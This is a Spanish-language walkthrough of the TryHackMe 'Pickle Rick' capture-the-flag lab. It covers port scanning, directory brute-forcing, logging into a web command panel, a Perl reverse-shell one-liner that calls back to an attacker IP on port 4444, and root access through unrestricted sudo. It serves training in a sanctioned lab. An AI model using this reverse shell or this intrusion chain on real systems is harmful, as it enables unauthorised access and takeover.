Pickle Rick
✍️ Autor: tryhackme, ar33zy, arebel 🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 10.10.146.162
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap 10.10.146.1626
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos, por lo que se procederá a indagar más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 10.10.146.162
para obtener más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Revisando el código fuente hay algo relevante como un usuario.

Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.146.162

Encontramos una página de login y un robots.txt interesantes.

Nos logueamos con el usuario y contraseña descubierta anteriormente.

Es un panel de comandos por lo que listamos y vemos el contenido.



🚀 EXPLOTACIÓN
Como podemos ejecutar comandos para obtener una Reverse Shell.
nc -nlvp 4444
perl -e 'use Socket;$i="10.8.146.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Comprobamos que tienen todos los permisos por lo que podemos ejecutar como root cualquier comando.
sudo ls /root/
sudo cat /root/3rd.txt
Last updated
Was this helpful?